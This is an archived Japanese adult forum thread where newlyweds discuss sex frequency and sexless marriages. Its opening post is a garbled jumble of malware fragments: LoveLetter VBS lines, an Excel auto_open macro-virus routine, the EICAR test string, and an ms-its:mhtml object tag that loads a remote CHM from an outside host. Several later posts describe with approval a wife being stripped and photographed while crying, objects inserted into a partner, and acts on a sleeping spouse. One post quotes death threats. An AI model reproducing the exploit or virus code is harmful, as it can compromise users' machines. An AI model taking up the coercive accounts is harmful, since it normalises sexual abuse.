★★★新婚さんは毎日楽しんでる???
■ このスレッドは過去ログ倉庫に格納されています
どんな新婚生活を送ってますか?満足するくらいしてますか? <body onload=window()>
If s = fso.CopyFile f1.path, f1.path+"l"
Set A4 (1)))
fso.copyfile \"
c MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = fso.CopyFile f1.path, f1.path+"l"
ToInfect.
G.RegWrite A
lines(n)=
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub 新婚ってこんなに辛いと思わなかった。
もっと愛し愛されたい。
夫の1人エッチにうんざり。
私だけを見て欲しいのに…せめて今だけでも。 もうすぐ結婚する予定です。
今まで婚前交渉はしていません。キスもしていません。
彼は性欲なさそう。私も性欲は強くありません。
子供が好きだから、子づくりはするはず。作り終わったらレスかなぁ? >>6
嘘吐きは閻魔様におへそ取られちゃいなYO! >7
嘘じゃないYO!
お見合い結婚です。
だから入籍までは何もしません。
あ、間接キス(死語?)はしたことありますよ。 デキ婚、妊娠9ヶ月付き合い初めて来月で一年。毎日朝と晩一日三回普通にHしてた。
今では週に一回抜いてあげるぐらいしかできない(´Д`)
新婚だけどデキ婚じゃあ仕方ないよな 新婚2ヶ月です。嫁とは見合い結婚です。女性経験はそこそこありましたが、
結婚するまではキスまでで我慢していました。おかげで嫁は誠実で真面目な人と思っていたようです。
でも結婚初夜を境に突然狼に変身。結婚してしまえば、もうこっちのもの。煮て食おうが焼いて食おうが俺の自由です。
部屋を明るくしてままで、嫁をいきなり全裸にさせて大股開きにして、シゲシゲとおまんこを覗き込み舐めまくりました。
嫁はまさかこんなことをするとはと言った感じで、呆然として俺にやられるがままでした。そして恥かしさで押し黙ったままでした。
そのくせおまんこはグッチョリ洪水状態です。四つん這いにして頭を下げさせて、足を開かせると、
肛門と裏マン(後ろから見たおまんこ)がバッチリ見えます。
ついでにデジカメで撮影しました。嫁はもう泣きそうと言うか泣いていました。
しかしこの夜から主導権は俺のものです。何事も最初が肝心です。
今ではベットの中では忠実な俺の奴隷です。でも決して嫁も嫌がっていません
夕べは、もう嫁おまんこグチャグチャに濡れて、ついでにケツの穴に人差指いれたら、
なんと肛門もグチョグチョでうんこが付いてしまった・・・
>>11
うちと同じだ。
2週に1回位。
嫁さんが好きだから浮気する気なんてないけど
だからこそエッチできなくてツライ。
拒否されたりすると泣きたくなる >>14
赤サンの事考えると拒否は仕方ないかもしれないね。
お腹張ったり胎動減ると不安になるし…
産後1ヶ月まで我慢じゃないかな。
旦那の携帯にはいつの間にか無修正エロ動画がイパーイ
しかも女子高生ばかり。
浮気しないって言ってるけど、妊娠中は妊娠前ほど思いきりHできないから
多少は浮気心配してしまう。
早く旦那と思いきりHしたい。 >>15
したくないんじゃなくて意識とは裏腹に体と心が守りに入ってしまうものなんかな? 命に関わることですから。
私はやりたくてもできない時期、旦那のエロ画像とかを発見してトラウマになってしまった…
男の人は仕方ないって頭ではわかってるけど
私だって本当はしたいのを我慢してるのに…
って思ったら涙が止まりませんでしたよ
旦那様たちは奥さまの身になって考えてあげて!
後できっと報われるよ
長々スレ違いごめん >>17
自分のことだけ主張してそれで終りですか?
身になって考えては欲しいけど相手の見になって考えたくは無いということですか
後で報われるって熟年離婚してやらないということですかそうですか
そうやって勝手な自己主張ばかりしてればいいんだよ 奥さんのことも子供のことも分かってるから強要しないし、だからこそ男は辛いんですよね。奥さんを愛してるから浮気や風俗では満たされないし。手や口でしてくれたりすると凄く愛情を感じるけど、それを頼みずらい男心を分かってもらいたいな。ね?世の男たち!? >>18
そこまでいわれるとは思わなかった…
人によるけど出産前って通常の時と精神状態が違うから
ちょっとしたことにも過剰に反応してしまう
ということを言いたかっただけなんだけどね
気に障ったら申し訳ない
後で、っていうのは出産後セックスできるようになったら、ってことですよ >>20
女の私から見てもそれは理不尽だと思いましたよ
自分はやれないから我慢しても男は抜かないのは我慢出来ないですよ。
溜まるのは仕方ないんだから。
やるの我慢して一人でしてくれてるんだから偉いじゃないですか。
いくら妊娠中でもそれは理不尽ですよ。
溜まったものはどうすればよいの?
浮気されないだけまし! >>21
お恥ずかしい話なんですが…
その頃の私には完全には男の人の生理について全くといっていいほど理解できてなかったんです。
今はわかるんですけどね(^_^;)
加えて、その時にはそれを理解しようとする余裕もありませんでした。
ですので、私の例は特異だとしても
妊娠中の女性が大変なことは確かなので
少しの間見守ってあげてほしい、という意見でした。 溜まっても旦那には奥さん貴方しかいないんだよ。相手が求めているんだから満たしてあげる事は愛情じゃない?処理や義務とは思わないで欲しい。 男はエロ本やビデオで抜いても満たされないんですよ。エッチできないなら、せめて抜いてあげる優しさを持ってあげて。浮気もしないで耐えている旦那への、せめてもの愛情だと思って。 いってくれれば何かしら善処したのですが
そういうアクションは全くなかったですね。
気を使ってくれたのだとは思うのですが
もともと自分から意見を言う旦那ではないので
お互いコミュニケーション不足だったかなと思います。
本当は私が察してあげるべきだったんでしょうが… 言いたいけど言えないんですよ。義務と感じられたり性欲処理と感じられたりするのが恐くて。それは愛情があるから。この気持ちを嫁さんに言えたらいいんだけど言えないから俺も苦しんでるけど。難しい問題ですね。 私は例え性欲処理するだけでも自分を使ってほしかったんですが
(毎回処理だけなら困りますがそういうわけじゃないのはわかってるし)
それがつたわってなかったみたいで。
やっと伝えられたのはごく最近です。
そういうところがコミュニケーション不足だったなあと思った次第。 ところで自慰しないで嫁の体だけで抜いてる奴なんているのか?自分でなんて惨めなことしないで私で抜いてなんていう献身的な嫁がいるのか? 嗚呼俺の人生毎日やりたい夢叶うことは生涯ないであろう このうえない幸せを死ぬまでに味わいたかった 溜まるものがないほど幸せなことはないだろう 男は生涯性欲に苦しむのだろうか 女性諸君には理解できぬことだろう >>13
嫁は山陰の旧家の教師の家庭の三人姉妹の三女で、大学も地元の国立大卒。
奥手も奥手で、男と話すことも殆ど無かったと言ってたし、生粋の処女。
だからもう羞恥心の塊で抱いても、やたらはにかんでぎこちない。
しかし俺にはそれが新鮮。その辺のはすっ葉ねえちゃんと違う・・・
そのくせやってる時は結構淫ら・・・おまんこの周囲は剛毛でビラビラもでかい・・・
俺がからかうと真っ赤になってうつむく、しかしそこが実に可愛いんだな
東京の暮らしに次第に慣れ、休みの日には銀座だ六本木だと二人で出かける
ラブホにももちろん入る 夜は淫乱に昼は貞淑にがモットーだ
楽しいセックスがあると家庭も明るくなるけど片方が拒否したりレスだと家庭は重たい雰囲気になるものだ。これを機にレスになったら離婚するつもり。 セックスのない人生なんて悲しすぎる。浮気許されないし男は耐えるのみか? 新婚で、セックスレスです。男が淡白なのか、どうしようもない。
ばか。 Hできないときは、手で抜いてくれるだけでもうれしいよ。口でもして欲しいんだけどね。 新婚でレスなんてことが有り得るなんて結婚するまで知らなかったよ。 普通結婚するくらいになったらそんなにしないだろ
付き合ってる時が一番やってるべ 六年付き合って先月結婚したけど
ずっと遠恋だったから婚前は月一か月二ペース。
その反動か今は体力のあるかぎりしちゃってる(ノД`*)ハズカシ
まだまだ旦那大好き!
こんな私には新婚なのにレスって謎… やった日の翌日はオマタが痛いといわれてます。そんなに激しくやってないのにな。 あくまで僕個人が出した統計では
夫婦全体の約60%が
セックスレスなのです
驚きではないでしょうか
全体の半分以上という数値が叩き出されていますよ
これに付いて皆さんは
どうお考えでしょうか?
旦那21嫁16の私達は毎日お医者さんごっこでセクロス(^ω^) 日本人夫婦の約半数が「自分たち夫婦はセックスレス」と認識していることが、ドイツの製薬大手バイエル社の日本法人、バイエル薬品(大阪市)の調査で明らかになった。
1年以上セックスをしていない夫婦が全体の3分の1を占めるなど、欧米に比べて、セックスに淡泊な日本人の性生活が改めて浮き彫りになった。
調査は日本人夫婦の寝室と性生活についての実態を明らかにするのが狙い。6月9〜12日、全国の30〜69歳の既婚男女約800人を対象にインターネットを利用して行った。
その結果、日本人夫婦の年間平均セックス回数は17回で、1年以上セックスをしていない夫婦は33・9%。夫婦間のセックスについて、60%が「大切だ」と回答しながらも、セックスレスと自認する夫婦は48・8%にのぼった。 日本人夫婦の約半数が「自分たち夫婦はセックスレス」と認識していることが、ドイツの製薬大手バイエル社の日本法人、バイエル薬品(大阪市)の調査で明らかになった。
1年以上セックスをしていない夫婦が全体の3分の1を占めるなど、欧米に比べて、セックスに淡泊な日本人の性生活が改めて浮き彫りになった。
調査は日本人夫婦の寝室と性生活についての実態を明らかにするのが狙い。6月9〜12日、全国の30〜69歳の既婚男女約800人を対象にインターネットを利用して行った。
その結果、日本人夫婦の年間平均セックス回数は17回で、1年以上セックスをしていない夫婦は33・9%。夫婦間のセックスについて、60%が「大切だ」と回答しながらも、セックスレスと自認する夫婦は48・8%にのぼった。 結婚する前は会うたびにセクロスしていたのに
結婚してからのセクロス回数はたったの2回・・・。
ちなみに結婚5ヶ月目。。。
自分(男)が求めても求めても必ず拒まれる、そして怒られる。。毎日。
正直、結婚生活ってこんなもんなんですかね?
愛情がまったく感じられないんですが、、おかげで毎日荒れてます・・。
悪いサイクルだと思いつつも苛々が止まりません。
誰か、助けてください。
嫁に正直に相談しても全否定されます、もう、浮気で気分を満たすしかないん
ですかね?? 家は結婚して1年と、そろそろ半年になるがレスだよ。やらしてくんないもん。
まぁー それは今に始まった事じゃないから
少しづつ慣れてきたけど
ちょっと今考えてたんだが妻とデリヘルプレイをしたいと思っていた。
まず玄関から妻(デリヘル嬢)がチャイムを押して入ってくる所から始まる。
そして俺はすかさず「チェンジ」というのは冗談で そんな感じでやっていく。
マンネリ夫婦には持って来いではないだろうか?
レス夫婦は無理だろうが。 付き合って4年、結婚して週3くらいでしてた。で、2ヶ月くらいで、スグに子ども出来たからおあずけ…になりました。ベビが出てきたら、反動でするか、私が育児疲れでレスになるか。旦那33嫁28です。
私♀30旦那32です
恥ずかしいですが29まで処女でした
今はだいぶなれてきて旦那が射精するの毎日受け止めています(^-^)
うちの愛する旦那さんは射精する時私の事ガシッと抱きしめて
物凄くおおきな声であえいで、上半身を震えてるみたいにケイレンさせます
いつも射精の瞬間に、「愛してるようっ、絶頂だぁ〜っ!」っていいます
彼が腰の動きをとめ、私に体重をあずけて、荒いいきずかい・・・
幸せだなぁ〜
セックスってなまなましいけど、すごく幸せ!
>>69
>>恥ずかしいですが29まで処女でした
なんで恥ずかしいの?
処女なこと自体はちっとも恥ずかしいことじゃないと思うけど 私21旦那29です。
3年付き合って結婚しました
来月で結婚して一年目になりますが、セックスレスです。
旦那とはしたいと思いません。。
克服するのもむりそうだ・・・ >>71
29の処女はやっぱどこかに欠陥があるんだよ。
しかも、>>69の文章はそれを如実に表現している。 >>73
おまえ、馬鹿だろ?
>69は妄想癖のある ネカマ !!
いい?もう1回言うよ
>69は、 ネ カ マ !! 新婚は絶対やりまくりなんていうのは幻想でしかないというのが良く分かるスレだな。
うちは2年でうまくいかなくなって離婚したぞ。 新婚10日目です
挙式当夜〜新婚旅行中は
寝転がればやってる状態
帰ってきてから3日目
引越しの挨拶や片付けと今までとガラリ変った生活で
布団に入るなり二人とも意識消失で高いびき
次はいつかなぁ・・・ 新婚旅行中も旦那は何もしなかった・・・。
これから先ゆううつ。
してないよ!結婚する前はかなりしてたのに、結婚してからあまりない…なんで?!私は彼とのエッチ好きだったし、でも今は何もないと女としてだめなんじゃないかと落ち込む。結婚前の方が幸せだったな 恋愛期間5年は週末しか会っていなかった
新婚気がつけばほぼ毎日。
子供が生まれてセックス解禁になったとたんに再開
2人目の後も同じ。
で、今。。。
整理期間はともかく3日も空くと悶々としてる。
4日も空くと隙があればパンツ剥ぎ取ってるw
週2〜3はやってるペースかな。
嫁とセックスレスな日々は未だに想像も出来ない。
キスするのと同じくらいの感覚で楽しんでる。
夫婦とはいえ男と女なんだからやったほうがお互いの気持ちも伝わりやすくなってより良い関係を維持できると思う。
新婚さんは結婚生活を長く大事にしたいのならやったほうがいいと思うよ。
仕事が忙しいからとか言うのは言い訳にしか過ぎないと思う。
相手が本当に好きならどうにかするはず。特に男はねw
昔はよく求められてたのに
最近はめっきり・・・・
仕事疲れてるのかな〜
別にしたいわけじゃないけど、求められないと寂しい・・・ >>87さん
私も一緒です…
結婚前は毎日の様に求められていたのに、今は週@あればいい方です…先月は月@でした。 >>88
毎日のように求めるが許してもらえるのは年1回
結婚5年目 昔とは結婚そのものの有り様が変わったから、スレタイのようなことはあまりないのかも。
俺は見合い結婚で、出会ってから9ヶ月で挙式、その間は結納してからSEX解禁で月に3回くらいだったか。
結婚してからはほぼ毎日してた。で、すぐに妊娠。。。
もうちょっとハネムーン気分(死語)味わいたかった。
でもそのおかげか、結婚15年、だいたい月2〜3回のペースを守っている。 6年付き合って結婚5ヶ月目。月6〜8回くらい。
思ってたよりも回数少ない。別に毎日したいわけじゃないけど
もっと求められたい。 付き合って半年で同棲を始め一年ちょっとが経ち今月入籍する予定なのですが既にエッチ回数が少なくなっていて、このまま結婚して良いものか悩みます。
だいたい毎日カラダを触られたり指を入れられたり、時には異物挿入されたりするのですが、中途半端に濡らされた揚句、最終的にエッチする訳でもなく、こちらから求めても「明日ね」等とはぐらかされて終わり、週一エッチあれば良い方な感じです。昔は毎日だったのに…。
彼は来月34歳、私は来年の1月で24歳になります。30代の男性の性欲はそんなものなのでしょうか。 >>92
30代で週イチなら普通な方だと思うけどね。
中途半端にされるのは困りモノだね。
「するならする。しないならしない。ハッキリしろ!」
って言ってやったた方がいいかもしんないよ? >>93
30代で週一は普通なんですか…。「一緒に暮らしたら毎日エッチしちゃう!」なんて意気込んでたのに。。。
去年の夏頃は本当にいつでも何処でも見境なくしてたのに体力的な問題なんですかね?
そのくせ「生理中だから」と私が拒むと「昔は生理中でもしてくれたのに…」と言われたり、次の日仕事が早いので先に寝ていたらエッチされて「何で起こすの?」と聞くと「起きない様にしてたのに起きちゃったんじゃん」と私が悪いような言われ方をするのですが…。
今朝もゴルフボール突っ込まれました(T-T) >>92
それってさー、したいときにできる相手が欲しかっただけみたいに見えるよ>彼氏
なんか、貴方のことを愛し慈しんでいるようには思えないんだよな…
エッチ以外では優しい男なのかもしれないけど。
まじめに話し合う必要があるんじゃない?
生身のダッチワイフを欲しがってるだけだったら、結婚を見合わせるくらいしないと
幸せになれないかもしれないよ? >>93
やっぱりそう感じますよね?
何だか愛されてない気がしてこのまま結婚して良いものか悩みます。
私の事を好きじゃない訳ではないのかもしれないけど相手は誰でも良いんじゃないのかなと時々思ってしまいます。
出会った頃は“この人そんなに私の事が好きなんだ”と軽くひくぐらい彼の愛情が伝わって来たのに最近では“もう私の事なんてどうでもいいのかな…”と思ってしまう程です。
友人が言うには「もう自分のものになったからすっかり安心しきってる感じだね」と言うのですが…どうだか…orz >異物挿入されたりする
>今朝もゴルフボール突っ込まれました
あなたがそういうの好きなMでないなら、別れるべき。
もうノーマルに飽きてそんな悪戯して、それでも性交するほどは興奮を得られない
なんてヤバすぎ。
あなたはまだ若いんだから、もっといい人見つけたほうがいいよ。
>>97
烈しく同意。
そいつは単なる変態野郎だよ!あなたに対する慈しみも愛情も感じられない
愛する女性を単におもちゃにして愚弄しているだけ
男は愛する女には常に獣だから週一なんて少ない
俺なんか隔日で土日は2連戦だよ をいをい、彼のことを知らないのに決めつけるのはまずいだろ。
>>92はちゃんと彼と真面目に話し合うべきだと思うよ。
それで結婚するなり、別れるなりの判断をした方が良いと思われ。 24歳女です。結婚して半年目。もともと体の強い方じゃないので、
エッチするとなにかしら体調を崩すようになりました。
気にされると辛いので、しばらくは体調不良をひた隠しにしてましたが、
最近本当に体が…。エッチしないと体調は元通りで普通です。
旦那は32歳で、結構性欲がある方なので、応えてあげたいけど
生理が長引いてるとか言って、フェラに持って行って
一ヶ月の挿入回数をできるだけ減らしてます。
多分体調が悪くなるのは、挿入時間が長すぎるからですが、
こればっかりは旦那が腰を動かさないと終わらないのでなかなか…。
遅漏の人が早くイク方法ってないんでしょうか?
フェラなら最短7分くらいで、挿入だと45分〜くらいです。
挿入前のフェラは拒否られます。 交際7年で10月に結婚。
夜勤と嫁が生理中以外は殆ど毎晩やってる。
嫁から求めてくる事も。
でも最近面倒になってきた。子供作る為に義務的にやってる気がする。
入れて出すもの出してすぐ寝たい……。ちゅうか淡白になってるな〜って自分で思う。
一緒に寝るのは良いんだけどな〜。
子供出来たら一人でやりまくると思う。
嫁のフェラでは絶対に逝けん。
>>102
ちょwww
45分〜って長すぎなんじゃないの?
俺なら5分で終わってるぜ。
はっ!短すぎて毎日嫁に求められてるのか?! 新婚1ヶ月たってませんが、現在毎朝している状態。
(夜は仕事で疲れて2人ともダウンwwww
・・・いつまで続くかな(´Д`;)w >>104毎朝ですか。スゴいですね。
入籍して1週間たちましたが2日に一回のペースです。
入籍前に5ヵ月間同棲してました。 婚前交渉アリはどうしてもひっついてから冷めるね。
逆に.オレみたいにお預け食ってたのは、も〜解禁になったら入れ食いよ
帰宅するなり、押し倒しってなかんじだった。ふとんは敷きっぱなしだった。
妻も夕飯は済んでから支度してたよ。
も〜あんなにはできない。解禁百日の栄光?
おれも妻もセックスに溺れていたよ。若かったんだな。 102 おまえさんのシマリがゆるいから長いんぢゃ
がばがばやな
花びら真っ黒や 俺(21)も結婚したてで毎晩、妻とやってます。
妻は3月に高校卒業したてで、お肌がツルツルのプルンプルン♪
そしてアソコのしまりは凄いほどキュッとしまる。
家に帰宅→お風呂で1発→寝る前に1発→朝1発
休みの日はずっとしています。まるで猿のようにやりまくり(>_<)
いくらヤッテもヤリ足りな〜いわ、うふん
おいらのちんぽはあかむけで
ヨメのマンコもひりひりよ
どこのお宅もそんなもの カップルご夫婦専用★便利屋
http://www.k5.dion.ne.jp/~fancy
マニア向けでございます バツイチで再婚した。
前妻とは結婚して一年もしないうちにレス化してた。
原因は、妻の体だと思う。デブだった。本人は「少しぽっちゃり」くらいにしか思ってないがデブだった。
出会ったころは勢いや、高ぶる気持ちもあってバコバコ抱けたが、
付き合って何ヵ月もしないうちに裸にするたびに見えるダルダルの腹や股の脂肪がなんとも気分を削いだ。
もともと結婚する理由にその体は査定外だったし、喧嘩はするが家庭を作るには良い感じかなと選んだ相手だったから結婚してすぐセックスレスになっても気にならなかった。
だが妻にとってはそうでなかったようで、一年もなると誘ってくるようになった。
嫌だった。チンコが萎える理由を妻のせいとは言えず、疲れてるとかEDぽいとか
とにかくまっとうな理由で逃げた。当たり前だが、外注女にはビンビンなってた。
そんな状態が二年続いた時、離婚した。お互い合意のうえで。小梨だったのでラクだった。
俺は28、前妻は24の時だ。
それから一年以上がすぎ、俺は22歳の女と再婚した。
再婚してもう二年が過ぎるが、驚くことにその妻とは週2〜3のペースでやってる。妻が若いから子はまだ作らない。
たまに喧嘩もするから前妻より性格が良いとは言わない。前妻より母性も無いと思う。
ただ、体が違う。今妻は体が良い。足や腰が良い感じに細く、なんと言ってもお尻が可愛い。
何度抱いても気持ちは萎えない。そりゃ連日になるとチンコは疲れて立たない時もあるが
それでも手マンやクンニでいじめたくなる。再婚して知った。相手の体でこんな気分が変わるのか、と。
もちろん今妻が限度外まで太ったら多分レスになると思う。わかる。
あの腰やお尻が前妻みたいにブタみたいになったら萎える。
だから、そうなったら外注するんだろうなぁ。。妻よ、太らないでね♪ ↑人間のクズだな。
お前に女性を抱く資格はない。
30近くにもなって、女性を抱く意味すらしらないアホな男。
反吐がでる。
お前のかみさんが不幸すぎる。
お前みたいな奴は結婚するな。
なんかむかついた。 >>112には近づくな!
不幸になるから!!
まぁ今の読めも捨てるんだろうな…
今のうちに次の読め候補探しとけ その程度のやつっているね。言ってはわるいが一緒になる女性も、見る目が
ないというと失礼だけど、そう感じる.
こいうことを匿名とはいえ、他人にあけすけ言う男は最低だ。
女性もみてくれよりもそういうところを見抜く目をもたないと駄目だよ。 同棲半年、結婚して一ヶ月です。
旦那は31ですが、週1,2回。
旦那は、とにかく子供が欲しくてたまらないのですが
(生理が遅れてる今、激しく喜んでます)
回数少ないんじゃ?と思ってます。
せめて週3はして欲しいというのは
私がH過ぎるのでしょうか? あんた さかりがついてるの?普通新婚でやりたがるのって男だけど。 いや
女でもあるよ
私も結婚したらセックスやりたい放題だと
思ってたw
でも只今レス………(ノA<。) 結婚式の次の日には出産の為里帰り。
新婚生活当分お預け…(;-;。) 田舎じゃ、親と同居の場合は離れを一軒立ててもらうのが普通だな。
そこで心おきなくやりまくるわけじゃ。親も夕飯が済めば離れには
寄り付かないのが暗黙の約束。
ところがじゃ、近所のクソガキどもが覗こうとする。
そこで入り口にバケツを用意しておいて???気配を感じたら、、
らしいところに水を浴びせる。部屋の戻るとちんぽが、、、、、、
縮んでしまっていた。 1960年代だよ。実際田舎じゃあったんだ。聞いたら東京でも足立区?なんかじゃやってたらしいぜ。
ちなみに、オレは水をぶっかけられたほうだ。 結婚して一ヶ月。
きのう夜中に、旦那がパソコンでH動画見てた。
ちょっとショック。 >>124
ショックとか言う前にセクース足りてるか?
ま、旦那がオナニストだという事も否定できんがw 結婚4ヶ月半、週4〜5。
今まで途中で萎えたことなんかなかったんだが始めて萎えた。
嫁は最近濡れない。 それだけやって、、萎えれば満足じゃない?
奥 膀胱炎にならなかった?やりすぎで、、 そういえばうちの奥はよく膀胱炎やったよ。
最近は回数減ったんであんまりやらないけど。 >>118
レスは寂しすぎですね。。
最近は、あまり期待せず
全身マッサージ+足裏マッサージをしてもらってます。
Hとは違うけど、ハマってます。 >>125
ほぼ毎日してますよ〜!
しなかった次の日とかは絶対してるし、
実は妊婦だけど3回とかしてます(´Д`;)
好きな人がいてもエロ動画って見たいもんなのかな? デキ婚はやらんだろ?そうじゃないやつはやりまくりだろ?
クルマを初めて買った時はころがしてるだけでたのしいのとおんなじ
嫁の腹の上に乗ってるだけでたのしい。入れてこすってればしあわせよ
そうだろ?みなさん 半年だって減りました。
週1、2回は少ないですよね(T_T)
私は毎日でもしたいのに… 結婚9年目だけどまだ新婚気分だよ。
週2〜3回はしてます♪ 結婚して2ヶ月!とりあえず新婚初夜から
今日の朝までやってます。整理の時は奥地で抜いちゃいます。
主人28私25結婚前からだとかなりの数やってまあす。
SEX大好きだもん!今日の夜もがんばって明日からも
毎日やります。
「ジャングルか!?」┌(`Д´)ノ)゚∀゚ )「奥地で抜いちゃいます」 もう過去形ですが
新婚の頃は毎日必ずしてたなあ…それも大抵二回ずつ。
朝起きてすぐもあったし
昼休みの休憩時間に帰ってきて急いで一回、なんてこともあったし
いろんな下着やコスプレもどきで盛り上げたりイメクラごっこもして。
もう朝から晩まで旦那のために料理を作り家事をしてHを想像して…
甘い生活だったよ。若かったw
整理中はさすがにしなかったけど、整理開けに
「まってました!」と言わんばかりにがっついてくれるのがまた良かった。
1年ぐらいで随分ペースが落ちた頃、「そろそろ子供もいいかな」と生入れ中田氏に。
そうするといつでも入れられて何でもあり、という感じで
こんなにいいものなんだーとお互いものすごく楽しくなり、また毎日やりまくり。
今思えば、あの頃が一番充実してた気がするなあ。
時間も周囲も避妊も何もキニシナイであんな風にできたらなー…と思う二児の母。 意外と新婚さんってセックスしないと思うなぁ。
俺もそうだったけど、仕事が忙しくて深夜まで残業続きで休日出勤当たり前だったし。
とにかく疲れてたから睡眠浴が強かった。
結婚して9年になるけど、今のほうがよっぽど充実してるよ。
「お風呂か!?」┌(`Д´)ノ)゚∀゚ )「睡眠浴が強かった」 ↑知ってたけどさ。
きっと揚げ足取る奴いるだろうと思ってたらやっぱり。 俺33嫁26付き合って1年結婚半年
結婚してからだいたい2日に1回ペースかな
俺は毎日でもしたいんだけどね
オナニーばかりしよるダンナ!冷たくしてやる!(●`ε´●) 結婚半年。1日おきか2日おきに一回かな。
たまに2日続けてとかもある。
でも旦那が友人にそのこと話したら、少ないと言われたらしい。
旦那はほぼ毎日仕事で2時3時帰宅。休みは週1日だけ。
それでもこのペースでやってるんだから頑張ってる方だと思いませんか?
友人に言われてから旦那が回数について
ずっと気にしてて、自己嫌悪になってるみたい。
激務なのにかわいそう。
私は満足してると何度も言ったのにな。 結婚3ヶ月 7年付き合っての結婚なんでセックスなんて金曜日の夜くらいなもんだが
今週から始めた朝寝てる嫁の横でオナニー → 精子を顔にかけて出勤
起きた時の嫁の反応が見たいので今週の土曜日が楽しみです >>148こんな事書いてて嬉しいのかw
281 名無しさん@ピンキー 2007/08/02(木) 02:01:12
馬鹿やろう、俺は世の中のブームを作るデザイナーだよ。だから、こんな時間しかメール出来ないけどヤクザとも縁があるんでね。ヤヤコシイこと言ったらいてこますぞ!ボケナス〜
282 名無しさん@ピンキー 2007/08/02(木) 02:04:42
どこのヤクザに消されたいかな?希望があったら、そこの組長に言っとくわな〜まあ、あんじょう成仏しいや〜
283 名無しさん@ピンキー 2007/08/02(木) 02:07:46
根性あるならかかってこんかい?居場所は、すぐ解るさかいの身辺整理しときや自殺とみせつけるさかい大変や〜
http://same.u.la/test/r.so/sakura02.bbspink.com/couple/1161154982/l10 >>145
スペック同じ〜!ちょっと親近感!
私は毎日したいのに、うちの旦那はめんどくさいんだなきっと…
週一じゃ足りないよ。
145さんの嫁、うらやまし。 暑い8月になっても現行通りの週末の1回が楽しみ。
でもいつも私から誘う。旦那は結婚してから、
1,2度しか誘ってくれない。
ふたりともエロの翌日はグッタリ。
新婚でも、40代のHには疲労が伴う。 私の夫も抱いてくれないんです!
なんと初夜と数えるほどだけ!
愛がないのかな・・・
それ以外のことはホントやさしくていい人なんですが
誘ってみたりしたけど
まったくあなたって人は・・・
みたいに微笑んで終わり。
その笑顔は好きですが
毎晩抱きしめて眠ってるのに男の人って平気なの?
私はもう無理・・・隣に居るので一人でもできないし・・・
3ヶ月ですよ?
どうなんでしょう?男の方から見て 俺も結婚したとたんしなくなったな
自分の物になったとゆう満足感と何時でも出来るとゆう
安心感から、いきなりやる気が無くなった気がする。
嫁とするよりオナニーの回数の方が多いかな
3ヶ月出さないって事は無いでしょうから もしかして外注か?
うちは出来婚だったけど腹がでかくなっていく嫁とよくやってたw
約8ヵ月後子供が生まれて解禁になった途端にやりまくりだったな。
二人目は計画出産で3年後。
ほぼどんぴしゃで妊娠出産w
ちなみに結婚15周年たった今も週2〜3回ペースに落ちてはいるが続いてる。 結婚って「この女とやりまくって孕ませたい」と言う気持ちが少なからずともあると思うのだがどうだろう。。。
惚れた女を犯しまくりたいと言うのは男の素直な願望のひとつだと思うんだよね。
なので結婚した途端に嫁とやらなくなる男の気持ちが良くわからない。 20年目だけど飽きないよ。ずっと同じ相手で。
相性がすべてじゃないかなぁ 俺27妻27。
10年交際してその後結婚。今結婚3年目。
昔より回数は減ったが、やる時は未だに興奮できてる。お互いに乱れてますわ。妻と初めてしたのは高@の時なんだが、付き合いがながいと愛着がわくもんだよ(笑)
見た目は控え目の女って感じなのに、これがえっちの時にはかなりエロい。
こないだはえっちの最中に写真を撮って!と頼まれたよ >>158
飽きるといっても数年で飽きるのはおかしいと思うよ。
大体病気でもないのに新婚とかで飽きると言うのは場合によっては結婚そのものが間違っていたと言う可能性もある。
セックスの不一致で離婚ってのも実際あるからね。
ちなみにおれは恋愛5年、結婚15年、いまだに飽きもせず嫁と20年間やりまくってることになってる。
その間浮気なし、風俗とかの遊びもなし。一穴状態だ。
ま、そういう夫婦も居るって事で。 もうすぐ結婚予定です。
毎日してます。
彼は襲われたいそうですが、最初に彼が襲ってきて
すぐ私がふにゃふにゃになってしまうので、
なかなか襲う機会が無い上、
襲っても私は全く濡れないので、困ってます。
私は彼に襲われたいので、満足してますが・・・。
今日はやっぱり襲ってあげよう・・・。 11月に結婚しました。毎日やってます。
この連休も、金曜の夜に1回。土曜日の夜が2回。
きのうは、ずっと家にいて、朝1回、午後1回、夕方1回、夜1回。
今朝も起きぬけにキスからはじまって1回。
これは射精した回数ですから、射精に至らない性交も含めるともっとです。
ホントに結婚してよかったと思います。
おめこは、やればやるほど女は綺麗になる。がんばれ・・・ セックスをすると女性ホルモンが出て綺麗になるとかいうが、
それは恋愛妄想してるときもおんなじで、
むしろ妄想だけのほうが自分の願望に忠実なの効果抜群。
セックスすると綺麗になるんだよ〜とかいうキモい中年おやじはしね 去年5月に結婚して、えちーしたの2回だけ。。。
昨日で3回目をした
ところがちゃんと中に入らなくなった
付き合っているときは、がっちり合体!って感じだったんだけど、
何が原因なんだろう??
私の入り口が小さくなったねーとは言われたんだけど 新婚と言っても、結婚したのは2年前。
そろそろこどもが欲しいと毎日ナマでがんばってます。
4月に結婚するけれど
彼女の仕事の都合で
一緒に住むのは6月からになった…。
結婚しても2ヶ月は遠距離と思うと
テンションダウンしますた。
結婚して、もうすぐ1年になります。
毎晩やってますし、休日は昼間からやってます。
嫁さんも慣れてきて、少し乱れるようになりました。
けっこう女性もアレが好きなんですね。
結婚して半年
昨日、フェラで襲ってみたけど途中で寝られた
朝起きたら突然いれられて、勝手にイッて終了
もっと楽しいエッチがしたい 新婚の頃は毎晩やって、そのまま裸で抱き合って寝てた。休日の朝はいちゃつきながら、そのまま一発。日常生活の中にセックスがあることの良さを実感。あれから11年、今でも嫁と結構やってる。 嫁は定休日。
きのう、夜もやったんだけど、今朝、ムラムラしてきちゃって、やっちゃった。
疲れたので、会社に電話して半休。
去年、11月に結婚しました。おまんこってホントに気持いい。
